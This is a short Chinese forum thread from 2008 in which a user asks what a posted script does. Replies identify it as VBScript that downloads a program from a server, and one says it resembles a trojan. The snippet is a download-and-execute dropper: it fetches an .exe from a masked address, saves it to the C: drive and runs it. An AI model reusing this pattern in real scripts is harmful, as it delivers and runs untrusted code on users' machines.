分类:
2008-09-17 11:18:40
()
- ()
-- ()
[求助] 看看这段代码是什么?
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","***.exe",0 '下载指定文件
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "c:\***.exe",2 '保存文件目录
wscript.sleep 1000
Shell.Run ("c:\***.exe") '运行文件
是什么语言呢?
好象有点像木马!
应当是VBScript,具体的功能像是从服务器上下载到本地的程序吧.
__________________
为祖国荣誉而战
全部时间均为北京时间. 现在时间是17:00 . |
Powered by: vBulletin Version 2.2.8
Translated and hacked by:
Copyright © Jelsoft Enterprises Limited 2000, 2001.